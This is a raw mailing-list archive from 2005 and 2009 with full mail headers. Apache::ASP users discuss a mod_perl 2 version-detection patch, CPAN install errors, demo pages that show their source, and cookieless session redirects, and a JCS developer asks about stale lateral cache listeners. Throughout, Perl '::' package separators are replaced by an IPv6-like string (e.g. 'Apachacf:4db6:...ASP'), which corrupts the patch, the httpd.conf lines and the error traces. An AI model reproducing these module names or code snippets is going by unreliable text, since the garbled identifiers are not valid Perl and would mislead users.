In-Reply-To: <[email protected]> User-Agent: eGroups-EW/0.82 MIME-Version: 1.0 Content-Type: text/plain; charset="ISO-8859-1" Content-Transfer-Encoding: quoted-printable X-Mailer: Yahoo Groups Message Poster X-Yahoo-Post-IP: 161.129.204.104 X-Yahoo-Newman-Property: groups-compose Sender: [email protected] X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N --- In [email protected], joel reed <joel.reed@d...> wrote: > > i needed to make the following change to get Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bASP 2.59 to > work with fedora core 4's mod_perl-2.0.0-0.rc5.3. > > without it i see: > > [Wed Jun 22 09:10:21 2005] [error] [client 161.129.204.104] Can't locate object > method "get" via package "APRacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTable" at /usr/lib/perl5/site_perl/5.8.6/Apache > /ASP.pm line 2022.\n at /usr/lib/perl5/site_perl/5.8.6/Apache/ASP.pm line 20 > 22\n\tApachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bASPacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bget_dir_config('APRacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTable=3DHASH(0x80422a94)', 'Global') > called at /usr/lib/perl5/site_perl/5.8.6/Apache/ASP.pm line > 277\n\tApachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bASPacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bnew('Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bASP', 'Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bRequestRec=3DSCALAR(0x8014fec4)', > '/usr/local/share/lm-4.0/web/status.asp') called at > /usr/lib/perl5/site_perl/5.8.6/Apache/ASP.pm line 183\n\tApachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bASPacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhandler('Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bRequestRec=3DSCALAR(0x8014fec4)') called at -e line 0\n\teval {...} called at -e line 0\n > > because $mod_perl2 is not set as it should be. > > HTH, > > jr > > here's what worked for me: > > --- /usr/lib/perl5/site_perl/5.8.6/Apache/ASP.pm.orig 2005-06-22 10:10:37.000000000 -0400 > +++ /usr/lib/perl5/site_perl/5.8.6/Apache/ASP.pm 2005-06-22 10:13:13.000000000 -0400 > @@ -63,7 +63,11 @@ unless($LoadModPerl++) { > } > > if($ENV{MOD_PERL}) { > - $ModPerl2 =3D ($mod_perlacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bVERSION >=3D 1.99); > + # release 1.999_22 of mod_perl seems to require > + # using $ENV{MOD_PERL_API_VERSION} not $mod_perlacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bVERSION > + my $ver =3D $mod_perlacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bVERSION; > + if ($ver eq "") { $ver =3D $ENV{MOD_PERL_API_VERSION}; } > + $ModPerl2 =3D ($ver >=3D 1.99); > if($ModPerl2) { > eval "use Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bASPacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bpacheCommon ();"; > die($@) if $@; > > --------------------------------------------------------------------- > To unsubscribe, e-mail: asp-unsubscribe@p... > For additional commands, e-mail: asp-help@p... > Nevermind.... I figured it out based on your post Thanks alot! Brian --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sat Oct 15 06:03:20 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 56332 invoked from network); 15 Oct 2005 06:03:20 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 15 Oct 2005 06:03:20 -0000 Received: (qmail 48556 invoked by uid 500); 15 Oct 2005 06:03:20 -0000 Delivered-To: [email protected] Received: (qmail 48370 invoked by uid 500); 15 Oct 2005 06:03:19 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <asp.perl.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 48359 invoked by uid 99); 15 Oct 2005 06:03:19 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 14 Oct 2005 23:03:19 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO mailgate.mysql.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 14 Oct 2005 23:03:20 -0700 Received: from localhost (localhost.localdomain [161.129.204.104]) by mailgate.mysql.com (8.13.4/8.13.4) with ESMTP id j9F62tdg022467; Sat, 15 Oct 2005 08:02:55 +0200 Received: from mail.mysql.com ([161.129.204.104]) by localhost (mailgate.mysql.com [161.129.204.104]) (amavisd-new, port 10026) with LMTP id 18492-04; Sat, 15 Oct 2005 08:02:55 +0200 (CEST) Received: from [161.129.204.104] (c-24-6-152-209.hsd1.ca.comcast.net [161.129.204.104]) (authenticated bits=0) by mail.mysql.com (8.13.3/8.13.3) with ESMTP id j9F62kpg019558 (version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NO); Sat, 15 Oct 2005 08:02:49 +0200 Message-ID: <[email protected]> Date: Fri, 14 Oct 2005 23:04:14 -0700 From: Joshua Chamas <[email protected]> User-Agent: Mozilla Thunderbird 1.0.2 (Windows/20050317) X-Accept-Language: en-us, en MIME-Version: 1.0 To: Stephen Hyde <[email protected]> CC: [email protected] Subject: Re: Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bASPacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bxtra problems References: <!~!UENERkVCMDkAAQACAAAAAAAAAAAAAAAAABgAAAAAAAAAh5b7GzyDFEmuLVHEnnMJecKAAAAQAAAAOoaZdcrystalferguson@example.org> In-Reply-To: <!~!UENERkVCMDkAAQACAAAAAAAAAAAAAAAAABgAAAAAAAAAh5b7GzyDFEmuLVHEnnMJecKAAAAQAAAAOoaZdcrystalferguson@example.org> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Scanned: by [email protected] X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Stephen Hyde wrote: > Hi, im trying to install apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8basp:extra on my server but I get the > following error whenever I try to run the cpan install, any ideas how I can > sort it out? The systems running centos 4 > > cpan> install Bundlacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bApachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bASPacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bxtra > CPAN usually lets you do a "force install Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bASPacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bxtra"... the extra modules themselves probably have a test you need to get past. Regards, Josh --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Mon Oct 24 10:16:14 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 55720 invoked from network); 24 Oct 2005 10:16:14 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 24 Oct 2005 10:16:14 -0000 Received: (qmail 34988 invoked by uid 500); 24 Oct 2005 10:16:13 -0000 Delivered-To: [email protected] Received: (qmail 34956 invoked by uid 500); 24 Oct 2005 10:16:12 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <asp.perl.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 34945 invoked by uid 99); 24 Oct 2005 10:16:11 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=HTML_MESSAGE X-Spam-Check-By: apache.org Received-SPF: neutral (hermes.apache.org: local policy) Received: from [161.129.204.104] (HELO server2.bpsol.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 24 Oct 2005 03:16:11 -0700 Content-class: urn:content-classes:message Subject: Running the asp demo example files Date: Mon, 24 Oct 2005 11:16:03 +0100 Message-ID: <[email protected]> MIME-Version: 1.0 X-MS-Has-Attach: Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C5D883.F0983730" X-MS-TNEF-Correlator: Thread-Topic: Running the asp demo example files Thread-Index: AcXYg/Bi1gbGRtfaT4euMxEZN8SVMQ== X-MimeOLE: Produced By Microsoft Exchange V6.5.6944.0 From: "Andrew Yu" <[email protected]> To: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N ------_=_NextPart_001_01C5D883.F0983730 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Hi, I am having problems with running the demo asp example files, essentially the source code is being shown in the web browser . =20 The system setup is Linux based =20 Fedora Core 4=20 Apache 2.0.55 Mod Perl 2.0.2 compiled statically within Apache. =20 Apache is installed under /usr/local/apache2 and the example site in /usr/local/apache2/asp/eg =20 For testing purposes I did a chmod -R 777 on the asp directory. I also checked the .htaccess is present in the asp/eg directory=20 =20 For the httpd.conf file I added these settings to the bottom of the httpd.conf file =20 PerlModule Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bASP <Files ~ (\.asp)> SetHandler perl-script PerlHandler Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bASP PerlSetVar Global . PerlSetVar StateDir /tmp/asp </Files> =20 <Directory $DOCUMENT_ROOT/asp/eg> Options FollowSymlinks AllowOverride ALL </Directory> =20 =20 This is the output from the site: =20 #!/usr/bin/perl /usr/bin/asp-perl=20 [0]%>> ([0]%>>source) =20 There appear to be no errors from the apache error_log =20 Any ideas or clues to this behaviour? =20 Thanks, =20 Andrew =20 =20 =20 ------_=_NextPart_001_01C5D883.F0983730 Content-Type: text/html; charset="us-ascii" Content-Transfer-Encoding: quoted-printable <html xmlns:o=3D"urn:schemas-microsoft-com:office:office" = xmlns:w=3D"urn:schemas-microsoft-com:office:word" = xmlns=3D"http://www.w3.org/TR/REC-html40"> <head> <meta http-equiv=3DContent-Type content=3D"text/html; = charset=3Dus-ascii"> <meta name=3DGenerator content=3D"Microsoft Word 11 (filtered medium)"> <style> <!-- /* Style Definitions */ p.MsoNormal, li.MsoNormal, div.MsoNormal {margin:0cm; margin-bottom:.0001pt; font-size:12.0pt; font-family:"Times New Roman";} a:link, span.MsoHyperlink {color:blue; text-decoration:underline;} a:visited, span.MsoHyperlinkFollowed {color:purple; text-decoration:underline;} span.EmailStyle17 {mso-style-type:personal-compose; font-family:Arial; color:windowtext;} @page Section1 {size:595.3pt 841.9pt; margin:72.0pt 90.0pt 72.0pt 90.0pt;} div.Section1 {page:Section1;} --> </style> </head> <body lang=3DEN-GB link=3Dblue vlink=3Dpurple> <div class=3DSection1> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>Hi,<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>&nbsp;&nbsp; I am having problems with running the = demo asp example files, essentially the source code is being shown in the web = browser .<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>The system setup is Linux = based<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>Fedora Core 4 <o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>Apache 2.0.55<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>Mod Perl 2.0.2 compiled statically within = Apache.<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>Apache is installed under /usr/local/apache2 and the = example site in /usr/local/apache2/asp/eg<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>For testing purposes I did a chmod &#8211;R 777 on = the asp directory. I also checked the .htaccess is present in the asp/eg = directory <o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>For the httpd.conf file I added these settings to the = bottom of the httpd.conf file<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>PerlModule Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bASP<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>&lt;Files ~ (\.asp)&gt;<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>SetHandler perl-script<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>PerlHandler Apachacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bASP<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>PerlSetVar Global .<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>PerlSetVar StateDir = /tmp/asp<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>&lt;/Files&gt;<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>&lt;Directory = $DOCUMENT_ROOT/asp/eg&gt;<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>Options FollowSymlinks<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>AllowOverride ALL<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>&lt;/Directory&gt;<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>This is the output from the = site:<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>#!/usr/bin/perl /usr/bin/asp-perl = <o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>[0]%&gt;&gt;&nbsp;&nbsp; = ([0]%&gt;&gt;source)<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>There appear to be no errors from the apache = error_log<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>Any ideas or clues to this = behaviour?<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>Thanks,<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>Andrew<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> </div> </body> </html> ------_=_NextPart_001_01C5D883.F0983730-- From [email protected] Mon Oct 24 10:37:39 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 62905 invoked from network); 24 Oct 2005 10:37:38 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 24 Oct 2005 10:37:38 -0000 Received: (qmail 47669 invoked by uid 500); 24 Oct 2005 10:37:37 -0000 Delivered-To: [email protected] Received: (qmail 47652 invoked by uid 500); 24 Oct 2005 10:37:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <asp.perl.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 47641 invoked by uid 99); 24 Oct 2005 10:37:37 -0000 X-ASF-Spam-Status: No, hits=0.6 required=10.0 tests=HTML_MESSAGE,NO_REAL_NAME X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: local policy) Received: from [161.129.204.104] (HELO mail.e-s-p.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 24 Oct 2005 03:37:36 -0700 In-Reply-To: <[email protected]> To: [email protected] Subject: Re: Running the asp demo example files MIME-Version: 1.0 X-Mailer: Lotus Notes Release 6.5.3 September 14, 2004 Message-ID: <[email protected]> From: [email protected] Date: Mon, 24 Oct 2005 11:45:20 +0100 X-MIMETrack: Serialize by Router on esphost/Euro Systems Projects(Release 6.5.3|September 14, 2004) at 24/10/2005 11:45:44 AM, Serialize complete at 24/10/2005 11:45:44 AM Content-Type: multipart/alternative; boundary="=_alternative 003A5A70802570A4_=" X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N --=_alternative 003A5A70802570A4_= Content-Type: text/plain; charset="US-ASCII" Hey all, Is it possible to complete a cookieless Redirect, but still holding the current SessionID? from my global.asa file, I run this command from a sub: $Response->Redirect( $Server->URL('test.asp', { err => 2 }) ); I call the sub at the start of an asp page What seems to be the problem is that it results in a new Session-id being created, which is not what I want - I want to keep the same session-id. Where am I going wrong? thanks Phil. --=_alternative 003A5A70802570A4_= Content-Type: text/html; charset="US-ASCII" <br><font size=2 face="sans-serif">Hey all,</font> <br> <br><font size=2 face="sans-serif">Is it possible to complete a cookieless Redirect, but still holding the current SessionID?</font> <br> <br><font size=2 face="sans-serif">from my global.asa file, I run this command from a sub:</font> <br> <br><font size=2 face="sans-serif">$Response-&gt;Redirect( $Server-&gt;URL('test.asp', { err =&gt; 2 }) );</font> <br> <br><font size=2 face="sans-serif">I call the sub at the start of an asp page</font> <br> <br><font size=2 face="sans-serif">What seems to be the problem is that it results in a new Session-id being created, which is not what I want - I want to keep the same session-id. Where am I going wrong?</font> <br> <br><font size=2 face="sans-serif">thanks</font> <br> <br><font size=2 face="sans-serif">Phil.</font> --=_alternative 003A5A70802570A4_=-- From [email protected] Mon Oct 24 16:19:47 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 54303 invoked from network); 24 Oct 2005 16:19:46 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 24 Oct 2005 16:19:46 -0000 Received: (qmail 79402 invoked by uid 500); 24 Oct 2005 16:19:45 -0000 Delivered-To: [email protected] Received: (qmail 79384 invoked by uid 500); 24 Oct 2005 16:19:44 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <asp.perl.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 79373 invoked by uid 99); 24 Oct 2005 16:19:44 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 24 Oct 2005 09:19:44 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO etr-usa.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 24 Oct 2005 09:19:40 -0700 Received: (qmail 91523 invoked by uid 13447); 24 Oct 2005 12:19:19 -0000 Received: from unknown (HELO [161.129.204.104]) ([161.129.204.104]) (envelope-sender <[email protected]>) by 161.129.204.104 (qmail-ldap-1.03) with SMTP for <[email protected]>; 24 Oct 2005 12:19:19 -0000 Message-ID: <[email protected]> Date: Mon, 24 Oct 2005 06:19:18 -0600 From: Warren Young <[email protected]> User-Agent: Mozilla Thunderbird 1.0.6 (Windows/20050716) X-Accept-Language: en-us, en MIME-Version: 1.0 To: Apache-ASP List <[email protected]> Subject: Re: Running the asp demo example files References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Andrew Yu wrote: > For the httpd.conf file I added these settings to the bottom of the > httpd.conf file I don't see that you changed the DirectoryIndex directive. Are you certain that mod_perl is working? Can you try a simple "Hello, world!" type program to prove it? --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Oct 25 08:22:33 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 51242 invoked from network); 25 Oct 2005 08:22:28 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 25 Oct 2005 08:22:28 -0000 Received: (qmail 44442 invoked by uid 500); 25 Oct 2005 08:22:25 -0000 Delivered-To: [email protected] Received: (qmail 44263 invoked by uid 500); 25 Oct 2005 08:22:24 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <asp.perl.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 44250 invoked by uid 99); 25 Oct 2005 08:22:24 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 25 Oct 2005 01:22:24 -0700 X-ASF-Spam-Status: No, hits=0.6 required=10.0 tests=HTML_MESSAGE,NO_REAL_NAME X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO mail.e-s-p.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 25 Oct 2005 01:22:22 -0700 To: [email protected] Subject: Cookieless Session Redirects not working MIME-Version: 1.0 X-Mailer: Lotus Notes Release 6.5.3 September 14, 2004 Message-ID: <[email protected]> From: [email protected] Date: Tue, 25 Oct 2005 09:30:10 +0100 X-MIMETrack: Serialize by Router on esphost/Euro Systems Projects(Release 6.5.3|September 14, 2004) at 25/10/2005 09:30:33 AM, Serialize complete at 25/10/2005 09:30:33 AM Content-Type: multipart/alternative; boundary="=_alternative 002DFAA6802570A5_=" X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N --=_alternative 002DFAA6802570A5_= Content-Type: text/plain; charset="US-ASCII" Hey all, Is it possible to complete a cookieless Redirect, but still holding the current SessionID? from my global.asa file, I run this command from a sub: $Response->Redirect( $Server->URL('test.asp', { err => 2 }) ); I call the sub at the start of an asp page What seems to be the problem is that it results in a new Session-id being created, which is not what I want - I want to keep the same session-id. Where am I going wrong? thanks Phil. --=_alternative 002DFAA6802570A5_= Content-Type: text/html; charset="US-ASCII" <br><font size=2><tt>Hey all,</tt></font> <br> <br><font size=2><tt>Is it possible to complete a cookieless Redirect, but still holding <br> the current SessionID?</tt></font> <br><font size=2><tt><br> from my global.asa file, I run this command from a sub:</tt></font> <br><font size=2><tt><br> &nbsp;$Response-&gt;Redirect( $Server-&gt;URL('test.asp', { err =&gt; 2 }) );</tt></font> <br><font size=2><tt><br> I call the sub at the start of an asp page</tt></font> <br><font size=2><tt><br> What seems to be the problem is that it results in a new Session-id <br> being created, which is not what I want - I want to keep the same <br> session-id. Where am I going wrong?</tt></font> <br><font size=2><tt><br> thanks</tt></font> <br><font size=2><tt><br> Phil.</tt></font> <br> --=_alternative 002DFAA6802570A5_=--
From [email protected] Tue Jul 07 06:10:35 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 85085 invoked from network); 7 Jul 2009 06:10:35 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 7 Jul 2009 06:10:35 -0000 Received: (qmail 15244 invoked by uid 500); 7 Jul 2009 06:10:46 -0000 Delivered-To: [email protected] Received: (qmail 15187 invoked by uid 500); 7 Jul 2009 06:10:45 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jcs-dev.jakarta.apache.org> Reply-To: "JCS Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 15177 invoked by uid 99); 7 Jul 2009 06:10:45 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 07 Jul 2009 06:10:45 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO kuber.nabble.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 07 Jul 2009 06:10:35 +0000 Received: from isper.nabble.com ([161.129.204.104]) by kuber.nabble.com with esmtp (Exim 4.63) (envelope-from <[email protected]>) id 1MO3sc-0000A3-Nh for [email protected]; Mon, 06 Jul 2009 23:10:14 -0700 Message-ID: <[email protected]> Date: Mon, 6 Jul 2009 23:10:14 -0700 (PDT) From: Andrei Povodyrev <[email protected]> To: [email protected] Subject: How to deregister Lateral Cache listeners in cluster? MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Nabble-From: [email protected] X-Virus-Checked: Checked by ClamAV on apache.org I am using Lateral Cache with Lateral Cache with UDP discovery. When a node in cluster goes down the other nodes do not discard their senders (LateralTCPSender) for the node. Is there way to remove them? Calling CompositeCacheManager.shutDown() on the node does not help I am wondering why this behavior was programmed this way. Would it be better to recreate the senders/listeners when the node again joins the cluster via UDP discovery? The current implementation presents me with a risk of losing cache events as the object stream oos in LateralTCPSender is closed anyway and first attempt to send fails (EVEN when the node is back). After failure is detected the sender is recreated by LateralCacheMonitor which *operates in a failure driven mode. That is, * it goes into a wait state until there is an error. Upon the notification of a * connection error, the monitor changes to operate in a time driven mode. That * is, it attempts to recover the connections on a periodic basis. When all * failed connections are restored, it changes back to the failure driven mode All consecutive sends will be fine but the first one will not get through. I consider this to be a SEVERE case. Is there any trick I missed? Thank you very much for your help -- View this message in context: http://www.nabble.com/How-to-deregister-Lateral-Cache-listeners-in-cluster--tp24367699p24367699.html Sent from the JCS - Dev mailing list [email protected]. 